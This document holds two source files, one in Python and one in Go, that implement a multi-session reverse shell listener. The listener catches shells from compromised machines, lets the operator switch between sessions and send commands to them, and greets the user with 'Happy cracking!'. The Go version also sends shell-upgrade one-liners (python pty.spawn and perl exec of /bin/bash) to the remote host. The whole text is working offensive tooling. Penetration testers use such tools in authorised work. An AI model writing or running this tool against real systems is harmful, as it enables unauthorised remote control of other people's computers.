File: reverseshell-listener.py
#!/usr/bin/env python3
# Reverse shell listener
# 
# @author Sebastian Ko sebastian.ko.dv@gmail.com
import sys
import time
import errno
import socket
import threading

def main():
    print("===========================")
    print(" Reverse Shell listener")
    print("===========================")
    port = 9000

    if len(sys.argv) <= 1:
        print("Usage: reverseshell-listener.py <port>")
        sys.exit()
    else:
        port = int(sys.argv[1])

    conntionpool = connectionThread("", port)
    conntionpool.start()

    connectedSession = 1
    while True:
        try:

            if connectedSession != 0:
                sessionMatch = False
                for client in conntionpool.clients:
                    if not client.quit and client.getSessionId() == connectedSession:
                        sessionMatch = True
                        client.interact()
                        connectedSession = 0
                
                if not sessionMatch and len(conntionpool.clients) > 1:
                    print("[-] No matched session or session has been closed")
                    connectedSession = 0
                elif len(conntionpool.clients) == 0:
                    # Wait until the connection comes on first time
                    connectedSession = 1
            elif len(conntionpool.clients) > 0:
                command = input("listener> ")
                connectedSession = commandHandler(command, conntionpool)
        except KeyboardInterrupt:
            sys.exit()

def commandHandler(cmd, conntionpool):
    connectedSession = 0
    try:
        
        command = cmd.split(' ')
        if command[0] == "help":
            print("sessions \t- List sessions")
            print("session <num> \t- Get into session by ID")
        elif command[0] == "sessions":
            print("---------------------->")
            for client in conntionpool.clients:
                print(client.status())
            print("<----------------------")
        elif command[0] == "session":
            connectedSession = int(command[1])
    finally:
        return connectedSession
    

def prompt(message):
    answer = ""
    while(answer != "Y" and answer != "N"):
        answer = input(message + " (Y/N): ")
        answer = answer.upper()
    return answer == "Y"



class connectionThread(threading.Thread):
    def __init__(self, host, port):
        super(connectionThread, self).__init__()
        try:
            self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.s.bind((host,port))
            self.s.listen(1024)
            print("[+] Listening on <%s:%d>" % (self.s.getsockname()[0], port))
        except socket.error as e:
            print("[-] Failed to create socket")
            print(e)
            sys.exit()
        self.clients = []

    def run(self):
        sessionId = 1
        while True:
            conn, address = self.s.accept()
            sock = Socket(conn, address)
            sock.listen(sessionId)
            shell = Shell(sock)
            self.clients.append(shell)
            print('[+] Client connected: {0}'.format(address[0]))

            # sessionId++
            sessionId = sessionId + 1


class Socket:
    addr = None
    port = None
    conn = None
    sessionId = None
    closed = False

    def __init__(self, conn, addr):
        self.conn = conn
        self.addr = addr
        

    def listen(self, sessionId):
        try:
            self.conn.setblocking(False)
            self.sessionId = sessionId
            print("[+] Got connection from <%s:%d>, Session ID: %d" % (self.addr[0], self.addr[1], self.sessionId))
        except socket.timeout:
            print("[-] Error: Connection timed out")
            self.close()
        except socket.error as err:
            print("[-] Error: Connection lost")
            print(err)
            self.close()

    def send(self, message, chunksize = 2048):
        try:
            for chunk in self._chunks(message, chunksize):
                self.conn.send(chunk)
            time.sleep(0.5)
        except socket.timeout:
            print("[-] Error: Connection timed out")
            self.close()
        except socket.error as err:
            print("[-] Error: Send error")
            print(err)
            self.close()


    def receive(self, chunksize = 2048):
        output = ""

        # Receive socket data
        try:
            while True:
                data = self.conn.recv(chunksize).decode()
                output += data
                sys.stdout.write(str(data))
                if not data: break
        except socket.timeout:
            print("[-] Error: Connection timed out")
            self.close()
        except socket.error as e:
            err = e.args[0]
            if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
                return output
            else:
                print("[-] Error: Connection lost")
                self.close()

    def close(self):
        try:
            self.closed = True
            self.conn.close()
        except socket.error as e:
            print("[-] Error: " + str(e))

    def isClosed(self):
        return self.closed

    def _chunks(self, lst, chunksize):
        for i in range(0, len(lst), chunksize):
            yield lst[i:i+chunksize]



class Shell:
    sock = None
    quit = False
    background = False
    backgroundCommand = 'rev-bg'

    def __init__(self, sock):
        self.sock = sock

    def interact(self):
        time.sleep(0.1)
        print("[+] Interact with Session ID: %d" % (self.sock.sessionId))
        print("[!] Type '%s' to background the current session" % (self.backgroundCommand))
        print("[+] Happy cracking!")
        # Reset parameter
        self.background = False
        # Loop for command
        while True:
            self.output()
            self.input()
            if self.quit:
                print("[+] Shell closeing..")
                self.sock.close()
                break
            elif self.background:
                print("[+] Background current session %d" % (self.sock.sessionId))
                break
            # Final check
            elif self.sock.isClosed():
                print("[+] Session closed..")
                self.quit = True
                break

    def output(self):
        self.sock.receive()

    def input(self):
        try:
            command = input()

            if command == self.backgroundCommand:
                self.background = True
                return

            # Send the command
            self.sock.send((command + "\n").encode())

        # Catch ^C
        except KeyboardInterrupt:
            print("")
            res = prompt("Do you really want to quit?")
            if (res):
                self.quit = True
                print("")
            else:
                self.sock.send(("\003\n").encode())

    def status(self):
        return ("Session ID: [%d], Connection <%s:%d>, Seesion killed? - %s " 
            % (self.sock.sessionId, self.sock.addr[0], self.sock.addr[1], self.quit))

    def getSessionId(self):
        return self.sock.sessionId


# Call main 
if __name__ == "__main__":
    main()

File: reverseshell-listener.go
/* Reverse shell listener
 * 
 * @author Sebastian Ko sebastian.ko.dv@gmail.com 
 */
package main

import (
	"bufio"
	"flag"
	"fmt"
	"io"
	"net"
	"os"
	"os/signal"
	"strconv"
	"strings"
	"syscall"
	"time"
)

var ctrlCChan = make(chan os.Signal, 1)
var backgroundCommand = "rev-bg"
var sessionHelpCommand = "rev-help"

func main() {
	fmt.Println("=======================================")
	fmt.Println(" Multithreaded Reverse Shell listener  ")
	fmt.Println(" v0.0.1                                ")
	fmt.Println("=======================================")

	// Keyboard signal notify
	signal.Notify(ctrlCChan, os.Interrupt, syscall.SIGTERM, syscall.SIGINT)

	var destinationPort string
	clients := map[int]*Socket{}

	flag.Parse()
	if flag.NFlag() == 0 && flag.NArg() == 0 {
		fmt.Println("Usage: reverseshell-listener <port>")
		os.Exit(1)
	}

	if _, err := strconv.Atoi(flag.Arg(0)); err != nil {
		fmt.Println("[!] Port cannot be empty and not an integer")
		os.Exit(1)
	} else {
		destinationPort = fmt.Sprintf(":%v", flag.Arg(0))
	}

	fmt.Println("[+] Press Ctrl+C+Enter to quit this application")
	fmt.Println("[+] Listening on port", destinationPort)
	go connectionThread(destinationPort, clients)

	reader := bufio.NewReader(os.Stdin)
	connectedSession := 1
	for {
		select {
		case <-ctrlCChan:
			fmt.Println("\n[+] Application quit successfully")
			os.Exit(0)
		default:
			if len(clients) > 0 && connectedSession == 0 {
				fmt.Print("listener> ")
				text, _ := reader.ReadString('\n')
				connectedSession = commandHandler(text, clients)
			} else if len(clients) > 0 && connectedSession != 0 {
				if !clients[connectedSession].isClosed {
					clients[connectedSession].interact()
				} else {
					fmt.Println("[-] No matched session or session has been closed")
				}
				connectedSession = 0
			}
			time.Sleep(1 * time.Microsecond)
		}

	}
}

func commandHandler(cmd string, clients map[int]*Socket) int {
	connectedSession := 0

	splitCommand := strings.Split(cmd, " ")
	switch strings.TrimSuffix(splitCommand[0], "\n") {
	case "help":
		fmt.Println("sessions \t- List sessions")
		fmt.Println("session <num> \t- Get into session by ID")
	case "sessions":
		fmt.Println("---------------------->")
		for _, client := range clients {
			fmt.Println(client.status())
		}
		fmt.Println("<----------------------")
	case "session":
		connectedSession, _ = strconv.Atoi(strings.TrimSuffix(splitCommand[1], "\n"))
		if connectedSession > len(clients) {
			fmt.Println("[!] Wrong session selected")
			connectedSession = 0
		}
	}

	return connectedSession
}

func connectionThread(destPort string, clients map[int]*Socket) {
	listener, err := net.Listen("tcp", destPort)
	if err != nil {
		fmt.Println("[-]", err)
	}
	//Assign session ID
	sessionId := 1
	for {
		// Listen for an incoming connection.
		con, err := listener.Accept()
		if err != nil {
			fmt.Println("[-] Error accepting:", err)
		}
		// Handle connections in a new goroutine.
		fmt.Println("[+] Got connection from <", con.RemoteAddr().String(), ">, Session ID:", sessionId)
		socket := &Socket{sessionId: sessionId, con: con}
		clients[sessionId] = socket
		sessionId = sessionId + 1
	}
}

/*
	Socket
*/
type Socket struct {
	sessionId    int
	con          net.Conn
	isBackground bool
	isClosed     bool
}

func (s *Socket) interact() {
	s.isBackground = false

	fmt.Printf("[+] Interact with Session ID: %d \n", s.sessionId)
	fmt.Printf("[!] Type '%s' to background the current session\n", backgroundCommand)
	fmt.Printf("[!] Type '%s' to show available commands\n", sessionHelpCommand)
	fmt.Println("[+] Happy cracking!")
	// Mark two signal for informational
	stdoutThread := s.copyFromConnection(s.con, os.Stdout)
	stdinThread := s.readingFromStdin(os.Stdin, s.con)
	select {
	case <-stdoutThread:
		fmt.Println("[-] Remote connection is closed")
	case <-stdinThread:
		// fmt.Println("[-] DEBUG: Terminated by user",stdinThread)
	}
}

func (s *Socket) copyFromConnection(src io.Reader, dst io.Writer) <-chan int {
	buf := make([]byte, 1024)
	syncChannel := make(chan int)
	go func() {
		// Defer handling
		defer func() {
			if con, ok := dst.(net.Conn); ok {
				if s.isClosed {
					con.Close()
					fmt.Println("[-] Connection closed:", con.RemoteAddr())
				}
			}
			// Notify that processing is finished
			syncChannel <- 0
		}()
		for {
			var nBytes int
			var err error
			nBytes, err = src.Read(buf)
			if s.isBackground || s.isClosed {
				break
			}
			if err != nil {
				if err != io.EOF {
					fmt.Println("[!] Read error:", err)
					s.isClosed = true
				}
				break
			}
			_, err = dst.Write(buf[0:nBytes])
			if err != nil {
				fmt.Println("[!] Write error:", err)
				s.isClosed = true
			}
		}
	}()
	return syncChannel
}

func (s *Socket) readingFromStdin(src io.Reader, dst io.Writer) <-chan int {
	buf := make([]byte, 1024)
	syncChannel := make(chan int)
	inputChan := make(chan []byte)

	// Input handler
	// Read on ctrl+c/z and input channel
	go func() {
		for {
			if !s.isClosed && !s.isBackground {
				var sendErr error
				select {
				case <-ctrlCChan:
					// Ctrl+C handle
					result := prompt(fmt.Sprintf("\n[+] Do you really want to kill session [%d] ?", s.sessionId), inputChan)
					if result {
						s.isClosed = true
						fmt.Println("[!] Press Enter to continue ..")
						return
					} else {
						_, sendErr = dst.Write([]byte("\003\n"))
					}
				case buf := <-inputChan:
					// Normal input channel
					_, sendErr = dst.Write(buf)
				}
				if sendErr != nil {
					fmt.Println("\n[!] Write error:", sendErr)
					s.isClosed = true
				}
			}else{
				break
			}
		}
	}()

	go func() {
		// Defer handling
		defer func() {
			if con, ok := dst.(net.Conn); ok {
				if s.isClosed {
					con.Close()
					fmt.Println("\n[-] Connection killed:", con.RemoteAddr())
				} else {
					fmt.Println("\n[-] Backgrounded session", s.sessionId, ", status:", s.isBackground)
				}
			}

			//Cleanup
			close(inputChan)
			// Notify that processing is finished
			syncChannel <- 0
		}()
		for {
			var nBytes int
			var err error

			nBytes, err = src.Read(buf)
			// Special command
			command := strings.TrimSuffix(string(buf[0 : nBytes]), "\n")
			commandExecuted := s.inSessionCommandHandler(command,src,dst)

			if s.isBackground || s.isClosed {
				break
			}
			if err != nil {
				if err != io.EOF {
					fmt.Println("[!] Read error:", err)
					s.isClosed = true
				}
				break
			}

			// Send input to the input channel
			if(!commandExecuted){
				inputChan <- buf[0:nBytes]
			}else{
				fmt.Println("[!] Press Enter to continue ..")
			}
		}
	}()
	return syncChannel
}

func (s *Socket) status() string {
	return fmt.Sprintf("Session ID: [%d], Connection <%s> Seesion killed [%t]", s.sessionId, s.con.RemoteAddr(), s.isClosed)
}

func (s *Socket) inSessionCommandHandler(command string, src io.Reader, dst io.Writer) bool{
	pythonttyCommand := "rev-python"
	perlttyCommand  := "rev-perl"
	
	if strings.HasPrefix(command, "rev-") {
		switch command {
		case sessionHelpCommand:
			fmt.Println("<-------------------------------------------------")
			fmt.Println(backgroundCommand,"- Background the session")
			fmt.Println(pythonttyCommand,"- Spawn tty bash shell using python (Linux)")
			fmt.Println(perlttyCommand,"- Spawn tty bash shell using perl (Linux)")
			fmt.Println("------------------------------------------------->")
		case backgroundCommand:
			s.isBackground = true
		case pythonttyCommand:
			fmt.Println("[+] Try Python 3 tty command ...")
			dst.Write([]byte("python3 -c 'import pty;pty.spawn(\"/bin/bash\")';\\n"))
			fmt.Println("[+] Try Python 2 tty command ...")
			dst.Write([]byte("python -c 'import pty;pty.spawn(\"/bin/bash\")';\\n"))
		case perlttyCommand:
			fmt.Println("[+] Try Perl tty command ...")
			dst.Write([]byte("perl -e 'exec \"/bin/bash\";'\\n"))
		}
		return true
	}

	//Default
	return false
}

func prompt(message string, inputChan chan []byte) bool {
	for {
		fmt.Print(message + " (Y/N): ")
		buf := <-inputChan
		input := strings.TrimSuffix(string(buf), "\n")
		input = strings.ToUpper(input)
		if input == "Y" || input == "N" {
			return input == "Y"
		}
	}
}
